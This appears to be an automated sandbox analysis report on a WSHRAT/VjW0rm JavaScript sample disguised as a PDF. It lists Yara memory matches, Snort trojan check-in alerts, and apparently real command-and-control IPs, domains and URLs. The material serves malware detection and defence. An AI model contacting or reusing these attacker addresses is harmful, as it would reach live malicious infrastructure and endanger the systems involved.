Source: Yara match	File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.71.108	unknown	Bulgaria		31420	TERASYST-ASBG	true
109.248.151.106	jemyy.theworkpc.com	Russian Federation		52048	DATACLUBLV	true

Contacted Domains

Name	IP	Active
jemyy.theworkpc.com	109.248.151.106	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://94.156.71.108:1604/is-ready	true		unknown
http://jemyy.theworkpc.com:5401/Vre	true		unknown

AV Detection

Found malware configuration

Source: amsi64_2316.amsi.csv

Malware Configuration Extractor: VjW0rm {"C2 url": "http://jemyy.theworkpc.com:5401/Vre"}

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49730 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49731 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49732 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49733 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49739 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49740 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49741 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49742 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49743 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49744 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49745 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49746 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49747 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49748 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49749 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49750 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49751 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49752 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49754 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49755 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49756 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49757 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49758 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49759 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49760 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49761 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49762 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49763 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49764 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49765 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49766 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49767 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49768 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49769 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49770 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49771 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49772 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49773 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49774 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49775 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49776 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49777 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49778 -> 94.156.71.108:1604

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 94.156.71.108 1604
Source: C:\Windows\System32\wscript.exe	Network Connect: 109.248.151.106 5401			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://jemyy.theworkpc.com:5401/Vre

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 1604

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 109.248.151.106:5401
Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 94.156.71.108:1604

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TERASYST-ASBG TERASYST-ASBG
Source: Joe Sandbox View	ASN Name: DATACLUBLV DATACLUBLV

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108

Source: unknown

DNS traffic detected: queries for: jemyy.theworkpc.com

Source: unknown

Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/&
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/3a
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/BootDeve
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/nPrevention_Q
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-ready
Source: wscript.exe, 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE1FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-ready.mui
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-ready;M
Source: wscript.exe, 00000006.00000003.2074574369.00000221C11C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyB
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyS
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyT
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyY
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readybM
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readykM
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readymM
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyng
Source: wscript.exe, 00000002.00000003.1894678392.0000020BE1D20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895231999.0000020BE1D22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected WSHRAT

Source: Yara match	File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

System Summary

Potential malicious VBS/JS script found (suspicious encoded strings)

Source: 34003198.pdf.js

Initial sample: Suspicious string win32_ D2LUMZJF

Windows Scripting host queries suspicious COM object (likely to drop second stage)

